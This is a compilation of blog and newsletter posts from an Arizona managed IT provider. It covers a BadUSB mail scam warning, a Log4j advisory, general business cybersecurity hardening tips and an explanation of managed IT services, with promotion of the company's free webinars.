Hackers Mailing Bad USB Drives

LeeShanok IT News

Hackers Mailing Bad USB Drives

According to a new FBI warning, cyber criminals are mailing USB drives capable of installing malware onto business networks. These known “BadUSB” attacks claim to either be a message from the Department of Health and Human services regarding COVID-19 or a gift from Amazon.

In these recent cases, USB drives injected keystrokes onto the victim’s computer. These keystrokes led to the installation of ransomware. This is one of many possible attacks BadUSB drives are capable of.

What should I do?

Never plug in an unfamiliar USB Drive. This includes devices received in the mail or found out in the street. Be extra cautious of USB drives with enticing labels like “Bitcoins” or “Gift Cards.” It’s best to dispose of these devices immediately.

If you come across a USB Drive you think may have important data on it, send the device to your IT provider. They will be able to view the contents in a secure sandbox environment.

USB Security, and Other Cybersecurity Tips, in This Week’s Webinar

USB Security is just one of the many important topics covered in the IT Security Awareness for the Common Worker 101B training.

The free training will take place this Thursday, January 13th from 11am – 11:45am. Topics include:

  • Next gen phishing prevention
  • USB Safety
  • Strengthening your Human Firewall
  • Updates & Patches
  • & Much More

Miss last month’s 101A training? No problem! 101B is a standalone webinar with crucial cybersecurity tips for every employee, regardless of IT expertise. Hope to see you there!

Register

LeeShanok Network Solutions

3877 N 7th Street | Suite 320 | Phoenix | Arizona | 85014
ITNews@leeshanok.com

Continue reading

LeeShanok IT News IT Resolutions for 2022!

The new year is just around the corner! As the calendar turns, it’s a great time to reflect on what you want from the year ahead. Here are our top five IT resolutions for 2022.

Top 5 IT New Year’s Resolutions

  1. Set your IT roadmap – What goals do you have for your technology next year? What will no longer be supported in 2022? What kind of support will you need? A clear destination makes the journey much easier.
  2. Schedule annual cybersecurity training for everyone at your company. Cybercrime is expected to increase again in 2022. Education is the best defense, make sure everyone is well trained. Our next cybersecurity training is Thursday Jan. 13th. Register Here.
  3. Get adequate cyber insurance – With the increasing risk, cyber insurance is growing more and more important. Make sure you have an appropriate policy. Riders on your general liability policy may no longer be enough.
  4. Invest in collaboration – The shift to hybrid and fully remote work is expected to continue in 2022. Make sure you’re getting the most from your collaboration tools so your teams don’t become isolated.
  5. Thoroughly assess your cloud strategy – Businesses are expected to continue migrating more functions to the cloud. This opens to the door to higher efficiency and lower costs but getting the migration right can be difficult. Each vendor, their reliability, security, and functionality all must be carefully considered.

As always, LeeShanok is happy to help! Let us know how we can help you stick to these resolutions, or any others you’re making for 2022.

LeeShanok Network Solutions is Turning 25!
On January 1st, LeeShanok will officially turn 25! We’re excited we can finally rent a car, but we’re even more excited to continue helping you manage your technology.

Our success is thanks to you, our clients. Since 1997, you have challenged us to grow and adapt. The technology landscape is entirely different today than it was back then but supporting happy clients has kept us motivated to keep learning and keep getting better.

From the entire LeeShanok team, our sincerest THANK YOU! We have a lot of exciting things planned to celebrate, stay tuned!

Your Technology Partner,

The LeeShanok Team

Phoenix:  602-277-5757         Tucson:   520-888-9122         ITNews@leeshanok.com

LeeShanok IT News – Major Vulnerability – Log4j Exploit

Last week, a significant cybersecurity vulnerability was identified dubbed Log4j or Log4Shell. The vulnerability allows hackers to remotely control a victim’s computer/server by running malicious code using an exploit in the Log4j library. The exploit is easy to execute and very widespread because the Log4j library is used in many software packages and online systems.

Because of the ease of attack, its widespread nature, and the potential damage, this is considered riskier than 99.61% of all cybersecurity vulnerabilities

What Hackers Are Doing Currently, hackers are primarily scanning for vulnerable devices and taking control of them to mine for cryptocurrency. However, it is possible for them to take much more malicious actions using this exploit.
What LeeShanok is Doing
We have seen scans and remote control attempts on several of our clients’ servers. Thankfully, next generation firewalls have successfully blocked these attempts at gaining control. If you are not sure if you have the correct type of firewall protecting you, ask your account manager.  

For all of our managed IT clients, we are automatically patching using the following process. This is included in your managed IT plan:
1. Checking to see if a breach has been attempted
2. If so, checking to see if any payloads have been executed
3. If so, assessing the risk level of the payload
1. If the risk is low, performing a malware scan
2. If the risk is high, taking the system offline and restoring from backup
4. Applying security patches and rebooting if needed
5. If there is a next generation firewall, confirm it is configured to block intrusion attempts
6. Perform a vulnerability scan to confirm the patch was successful

If you are not a managed IT client, and you would like our team to assist with assessing your systems, please reach out to us for support.

What You Should Do
Stay alert for any updates/patches pushed out by your other technology vendors and install them immediately. Keep an eye out for further communication from LeeShanok pertaining to your unique situation.
 
The LeeShanok Team
 
Phoenix:  602-277-5757         Tucson:   520-888-9122         ITNews@leeshanok.com

How to Improve Cybersecurity

IT cyber security is designed in layers. Digital threats to a company usually originate from outside. Threats that breach a layer tend to settle in and seek other devices at the same layer. When the attempt to breach the next layer is made, malicious programs will make attempts from multiple devices. By the time inner layers are breached, many devices have already been compromised, and exfiltration of company data has probably already occurred. See Why Cybersecurity is Important.

With network infrastructures that include both on-premises and cloud-based infrastructure, layering your network cybersecurity to protect it all can be challenging. Historically this would require unique solutions for each part of the infrastructure, but today there are solutions available that simplify and consolidate monitoring and management. There are many ways to protect against threats. Below are actionable ways to improve your firm’s cybersecurity.

End Users & Devices

Protect Wi-Fi Network Access from Cyberattacks

Many firms have both staff Wi-Fi and guest Wi-Fi networks. There’s usually a password required to connect to the staff Wi-Fi, but many times the guest network has no password. This opens the door for direct cyberattacks against connected devices. Use a password on all your firm’s Wi-Fi networks.

Another issue emerges with Wi-Fi authentication when an employee is terminated. The terminated employee could park close by and connect to the guest Wi-Fi (open) or staff Wi-Fi network (Wi-Fi password still the same), where they could launch attacks against other connected devices or seek company data to steal.

Most firms do not change the Wi-Fi password on termination of an employee because it requires all remaining employees to change the password in the devices they connect with. As time goes by, more and more terminated employees will have access to the company’s Wi-Fi networks. Adding a RADIUS Server to your Wi-Fi authentication fixes this by coordinating with the user’s Active Directory (AD) account. When an employee is terminated, simply marking their AD account “inactive” prevents them from connecting to the Wi-Fi network. No other employee’s access is affected.

Security Measures on Mobile Devices

Regardless of operating system, many employees use personal mobile devices to read company email, log in to cloud accounts, generate and send quotes, and other tasks that require access to company networks and data.

These employee devices may not meet sophisticated cybersecurity measures the company demands from connected devices, and are therefore vulnerable to external access and cyberattacks. If an employee loses their device, all the data and stored credentials may be available to cyber criminals.

To guard against these risks, it’s important for companies to use a Mobile Device Manager (MDM) and enroll all personal phones that are used for company business. Good MDMs push group security policies to enrolled devices, and also locate or wipe a lost phone. Employees should also set up “Find My Phone” while they have the device in their possession so that lost devices are easier to recover.

Utilize Group Policies for Cybersecurity

Group policies are central rules that can be applied to all devices that access company resources. Common cybersecurity policies can be designed for all user accounts and devices at time of login. Policies can also be designed by groups. For example, senior management devices have different cybersecurity rules than front-line workers.

Pushing out cybersecurity policy in this fashion eliminates the need to sit at each device and configure its security in case of a security breach, and it provides common security policies to all employees with certain job types or common access to specific data stores.

Improve Employees’ Password Management

Many employees have a favorite password they never forget, and they use it across multiple websites and their domain login. A data breach at just one of those sites, and all the employee’s accounts are compromised. A better strategy is to use a different password on each site, but that can be impossible to remember without writing them down, another risky practice.

The best strategy is to use a company-wide password manager that generates complex passwords and provides access to password folders via role-based policies. Some password managers provide segmentation of each user’s passwords with their own secure folder, allowing them to manage both their personal and professional passwords. With this strategy, your employee only needs to create and memorize one strong password for the password manager.

Enable Multi-Factor Authentication on All Your Accounts

Enabling two factor authentication for adds a layer of protection to each user account’s sensitive information on personal devices. When logging in, after the username and password are accepted, the site sends a text or notification to an authenticator app on your phone. If you verify the notification, then the connection is completed.

Strong authentication is particularly useful in squashing security risks like a stranger’s attempt to access one of your online accounts and trying to steal your personal data. You would receive notification about a login attempt but did not initiate it. That would be a good time to change the account password to a different strong password, as it’s clear someone has the current credentials or personal information.

Individuals can reduce their cyber risk by enabling MFA on many individual sites, but a faster way is to have your IT department or your managed IT service provider require it for all accounts.

Require Cybersecurity Training

The user is the most important security measure, and an educated user fortifies all other layers of security. Up to 95% of cybersecurity breaches are the result of human error, so it’s important to have all employees regularly trained on cybersecurity best practices.

Keep your business safe with one of the many webinars and in-person trainings are available, but it’s important to select a provider who is knowledgeable and has invested in the quality and delivery of the material.

LeeShanok’s IT Security for the Common Worker series is a free, monthly webinar that teaches cybersecurity best practices to employees of all levels of IT skill. LeeShanok also offers custom, in-person training to Arizona businesses.

Local Network Infrastructure

Assess Your Network Infrastructure and Security

Before making changes to your network, it’s important to assess what you currently have and create a network diagram if one does not exist already. Making changes without understanding the current network layout can result in additional complexity and reduced security.

If you’re not sure where to start, most managed IT service providers (MSPs) offer network assessments that generate documentation of the infrastructure, credentials, configurations, and recommendations to improve security.

Some MSPs like LeeShanok also offer network security assessments, which includes network assessment documentation, along with analyses of the security posture and risks that are present. A network security assessment may also include penetration testing to test actual vulnerabilities.

Segment Your Network

If you have two Wi-Fi networks (like a staff and guest network), segmenting the two into VLAN 1 & VLAN 2 provides a security barrier. Devices and sessions running in one VLAN are blocked from accessing devices in the second VLAN. Network segmentation can be physical or logical and involves breaking down a network into smaller subnets.

Segmenting your public Wi-Fi architecture and maintaining software updates helps simplify management of firewall policies, reduces the overall attack surface, and strengthens your firm’s security.

Proactively Manage Infrastructure

It is very important that the cybersecurity of your network not be a set-and-forget exercise. Even the best defenses see reduced protection over time as bad actors test for and identify vulnerabilities. Many smaller firms use home-grade devices, resulting in big security holes for sophisticated breach strategies.

It is challenging and expensive for internal staff to continuously manage these risks, which is why many use a “set and forget” strategy. Professional Managed IT Service Providers solve this by specializing in proactively securing, fixing, and updating technology more affordably than additional internal staff.

Consider hiring a Managed IT Provider if your internal resources aren’t able to regularly research and deploy new cybersecurity strategies to keep up with the evolving threat landscape.

Replace Legacy Devices

Improve your cybersecurity posture by replacing aging devices with new devices that have more sophisticated and coordinated security features. Work with your internal IT or your managed IT service provider to select new devices that align with your overall IT strategy.

Following deployment, it is also important for you or your managed service provider to actively manage infrastructure components, keep their firmware and software up to date, and investigate all notifications when threats are detected.

Update Firmware and Software in All Devices

Many attacks exploit vulnerabilities in networking, server and end-user devices. Manufacturers respond to discovered vulnerabilities by developing and releasing updates and patches to both firmware and embedded software. Most devices do not automatically install updates, so there is human involvement needed to search for and install updates to devices. This process should be repeated at least quarterly for all infrastructure devices. Learn how to Update Firmware in Network Devices.

Software suites also regularly release updates and patches to be installed. Some are installed automatically, while others need to be manually installed. All employees should be keeping software up to date.

Use SSL VPN for Site-to-Site Connections

Virtual Private Networks (VPNs) have been a secure method to remotely connect to company resources for years. Unfortunately, most VPN software apps have vulnerabilities that can allow a hacker to gain admin access to the interface, opening it up for rogue connections to a company domain.

Upgrade to SSL VPN connections, which require an SSL Certificate be purchased and imported into each connected firewall to establish trust. New VPN software is required on end user devices to allow connection via SSL VPN.

Other permanent VPN tunnels may be used to connect a local network to a cloud hosted environment like Microsoft Azure. SSL VPN should be used here as well to protect the connection and access to the hosted environment.

See LeeShanok’s IT News articles on:  SSL/TLS Migration for PCI Compliance, Work Remote Securely

Manage Firewall Ports

Firewall ports are used for computer-to-computer communication. Many firewall ports are open by default, like 443 for internet traffic. Some ports should be managed more actively, opening when network packets need to pass and then closing until the next packets need to pass.

Ports can be closed by disabling the service or using network firewall rules that Deny-All-Permit-By-Exception (DAPE). Also disabling Universal Plug and Play (UPnP) in the firewall prevents any computer in the network from opening ports without challenge.

Enabling both network firewall and host-based firewall capability is a best-practice. Enabling firewall rules will block external services, but should be tested to make sure desired services can still communicate.

On end-user computers, port management is done by antivirus apps. It’s usually fine to allow the default configuration, but some firms may have a group policy that pushes out different security policies to all end-user devices.

Set Up GeoLocation and GeoBlocking

Certain geographies are known to present greater cybersecurity risks. For example, more cyberattacks originate from China and Russia than any other countries. GeoLocation estimates where a connection originates, and GeoBlocking blocks connections from those regions.

If your company doesn’t do business in a risky geography, it should be GeoBlocked by default. Most newer firewalls have this option available.

Cloud Infrastructure and Services

Migrate from Backups to Business Continuity & Disaster Recovery

To recover from a breach, infection or ransomware, backups are the best method. Traditional backups usually involved an external USB drive physically plugged in to a server or end user computer. This backup method may not include cloud-based data, it doesn’t protect against an on-premises disaster, and recovery may take longer.

Modern backup capability includes business continuity and disaster recovery (BCDR), which backs up operating systems, Active Directory configurations, and storage. BCDR usually involves an on-premises backup which has the ability to complete a restoration in a few minutes or hours, rather than the days or weeks a server re-build requires. There’s also a redundant cloud-based backup in the event of an on-premises disaster.

Diagram of the structure of Datto’s Siris BCDR solution.

Backup your Cloud Environments

Modern backup strategies should also include important Software-as-a-Service (SaaS) accounts like Microsoft 365 or Google Workspace. Microsoft protects their data center and all data from natural disasters and failures. However, you are responsible for data loss due to human error, external hackers, malicious insiders, and more.

Approximately 90% of all companies use the cloud in some capacity and falsely assume data is backed up automatically. SaaS Protection for cloud accounts is a must-have for a modern backup strategy.

Monitor Dark Web for Compromised Company Credentials

Dark web monitoring generates reports of users in your domain whose usernames and passwords are found for sale on the Dark Web. A Dark web monitoring service can notify you when those credentials are compromised, so you can have the employee reset passwords and enable Multi-Factor Authentication.

LeeShanok offers a complimentary Dark Web Scan that shows the compromised usernames and passwords of everyone with an email address on your company’s domain.  

Migrate from EDR to XDR

Endpoint Detection and Response (EDR) is the traditional method of monitoring endpoints for advanced persistent threats and new malware that may evade defenses. Extended Detection and Response (XDR) spans across platforms, endpoints, on-premises environments, cloud environments, and endpoints.

XDR usually provides a “single pane of glass” view for monitoring and responding to threats. XDR also uses artificial intelligence (AI) to scan various logs from multiple platforms and provide accurate, context-rich alerts.

Plan for Secure Access Service Edge (SASE)

SASE is a new framework in which networking and security converge into a single integrated service that works at the cloud edge to deliver networking and security functions as a service. With widespread cloud adoption, the SASE model simplifies and consolidates many different networking and security functions.

The technology is still in its early stages, but expect to adopt this model soon if your organization hasn’t yet. As an example, Cisco’s SASE offering includes:

  • SD-WAN
  • Cloud security
  • Zero trust conditional access
  • Umbrella security
  • Secure access by DUO
  • ThousandEyes for network outage monitoring

Hire a Managed IT Security Provider

As you can see, improving cybersecurity can be a challenging task. It requires constant vigilance and a high degree of technical expertise. Threats like ransomware are increasing every year, and businesses of every size are lucrative targets.

Many companies choose to hire managed IT service providers for their IT security. It’s generally more cost-effective, and the knowledge pool is deeper than what can be achieved with most internal IT teams. LeeShanok has been providing IT security since 1997. Request a complimentary network assessment to find out where your network is vulnerable, and which steps are most important for you to take.

What are Managed IT services?

Managed IT consists of a collection of services performed by an external IT company, also known as a Managed Service Provider (MSP). Managed IT services are more comprehensive than other forms of external IT like break-fix support. Managed IT represents a partnership between the client and the MSP, where both parties are invested in the long-term success of the client’s IT strategy.

Managed IT services are sometimes confused with outsourced IT because both are performed by third-party IT specialists. However, managed IT takes a more holistic and proactive view of technology management, while outsourced IT is employed for more specific tasks. “Outsourced IT” can also conjure images of overseas support from an impersonal call center. Managed IT is a closer partnership built on a trusted relationship with a provider that is typically local. Learn how managed IT works and some of the most common services offered under a managed IT Plan.

How IT Works With a Managed Service Provider

IT services from a managed service provider can be thought of as a subscription. The managed services are offered in exchange for a recurring fee. Payment structures vary, but the general model is the same. Long-term, comprehensive IT managed services are delivered in exchange for regular payments. In the IT world, this is sometimes referred to as the “X as a Service” (XaaS) model. In most cases, the monthly payments will total less than the amount required to hire full-time staff.

Another iManaged service providers and client companies agree on the responsibilities of each party in the agreement. The formal contract is called the Service Level Agreement (SLA). The SLA spells out the services the MSP will perform, performance metrics, and fees that the managed service provider will charge. It also clearly defines the responsibilities of the client and the responsibilities of the MSP.

Once the SLA is agreed to and signed, you and the managed services provider work together to transfer management to the MSP. Managed IT services are highly involved, so expect to work closely with the provider.

Common Managed Services

Managed service providers are diverse in their capabilities and specializations. Some focus specifically on certain services or industries. Others are more flexible, able to adapt to your unique needs. The following are common managed services, but this is not an exhaustive list.

Network Design and Administration

Network administration is the management of an organization’s connected IT infrastructure. Common network devices include servers, firewalls, wireless routers, shared storage, and end-user computers. The list of possible devices and configurations that can be on a network is almost limitless. The managed IT service provider takes responsibility for recommending, installing, and servicing network devices with an eye toward long-term performance.

Top MSP’s also manage vendor relationships and support contracts, sending renewal notices or invoices when they come due, which enables access to patches to firmware and software. The best Managed IT Providers will future-proof your network by making sure it has the capacity and scalability to keep up with business growth.

Monitoring and Maintenance

With managed services, your technology infrastructure is proactively managed. Networks and devices are actively monitored to catch and resolve issues before they can cause significant problems, which can greatly reduce unpredictable labor bills. Maintenance focuses on keeping current devices up to date and healthy rather than simply repairing broken devices. Just like with car maintenance, spending a little on routine work now prevents costly breakdowns in the future.

IT Security

IT Security services are some of the most important on the managed services market. Cyberattacks against businesses increase in frequency and severity every year as hackers uncover new device vulnerabilities and launch sophisticated campaigns against companies.

IT security is a component of most other managed services. For example, firewall maintenance is part of network administration. However, proper IT security now requires a security-first, zero-trust philosophy rather than just security technology.

Further, an IBM study revealed up to 95% of cybersecurity breaches are the result of human error. Employee education is a key component of cybersecurity, so your managed IT service provider should offer IT security training for your employees. LeeShanok hosts a free monthly webinar series, “IT Security for the Common Worker.”

Many managed IT service providers stop at providing technical solutions like firewalls and intrusion prevention systems. A newer class of service providers called Managed Security Service Providers (MSSPs) go beyond by offering advanced threat detection, response, and compliance with governmental and industry requirements.

Data Backup and Recovery

Data loss happens for many reasons. It can be the result of hardware failures, natural disasters, employee errors, or hackers – just to name a few. It can consist of destruction or exfiltration of sensitive company information like contact lists, access credentials, customer data, and more. Data backup and recovery services mitigate the risk of losing data while reducing downtime with a strong disaster recovery plan.

Under a managed services plan, data backup and recovery involves two components: technology and strategy. Technology is the hardware and software that stores the backed-up data and restores systems. Strategy answers questions like, “should we keep a backup on-site, off-site, or both?” and, “how much downtime is acceptable in the event of a disaster?”

Managed services help with both technology and strategy. A provider can recommend, install, and service the technology. More importantly, a Managed IT Service provider can help you develop and a strategy that finds the perfect balance between cost, performance, and continuity.

Voice and Video Communications

A managed services plan can also include the support and maintenance of your business communication technologies. Voice over Internet Protocol (VoIP) phone systems are becoming the standard for most businesses. There are dozens of phone system providers with multiple configuration options, making it hard to know which system is the best fit. A managed service provider can help support your current phone system or select and install a new one.

Similarly, videoconferencing on platforms like Zoom, Microsoft Teams, and Cisco Webex has become essential, especially for companies with a remote workforce. A managed IT service provider can help you select the appropriate licenses and ensure your network and hardware can support videoconferencing.

Helpdesk Support

Where do you turn when you have problems with technology? For the majority of a firm’s workforce, it’s the helpdesk. An IT service provider’s helpdesk fixes common problems like:

·         My printer isn’t working

·         I can’t connect to the internet

·         I accidentally deleted a file

·         I forgot my password

Helpdesk support is an important component of a managed services plan because most employees interact with IT via the helpdesk. Great customer service is what separates a competent managed service provider from an exceptional one.

Seek out customer reviews, the option for remote monitoring, infrastructure management, technology services, support services, and testimonials when considering a Managed IT services company.

Cloud Management

Companies large and small are phasing out on-premises IT infrastructure in favor of cloud services. Without a strong cloud management strategy, it can be easy to overspend and hard to know which services you truly need. Managed IT services can help you select the appropriate cloud vendor and the proper level of cloud computing to make sure goals are met and budgets aren’t blown.

Some managed IT service providers like LeeShanok also offer their own data center for hosting private cloud environments with virtual servers, centralized storage, and secure access by remote and office-based staff. This is especially important if your business requires a private cloud environment.

Cloud Management

Benefits of Managed Service Providers

You know the common services included under a managed IT plan, but why would you use managed services over an internal IT department? The two are not mutually exclusive, but instead complement one another effectively.

Managed IT services save companies time, money, and headaches on Information Technology to improve business functions. This is often achieved by working with a company’s internal IT department. Many managed service providers will want to displace a one or two person internal IT team. Instead, LeeShanok works very well with internal IT departments and recommends evaluating the business’s technology needs. Generally, for every 75-100 employees of a company, a full time central IT contact or support who is partnered with a managed service provider is recommended.

Our guide to Why IT Managed Services are Important for your Business spells out exactly how and why managed IT services are structured to benefit clients over other forms of IT management.

Explore Managed IT Services for Your Business

LeeShanok has been providing Managed IT Services to Arizona businesses since 1997. See if we’re a good fit for your organization by requesting your complimentary network assessment and consultation below.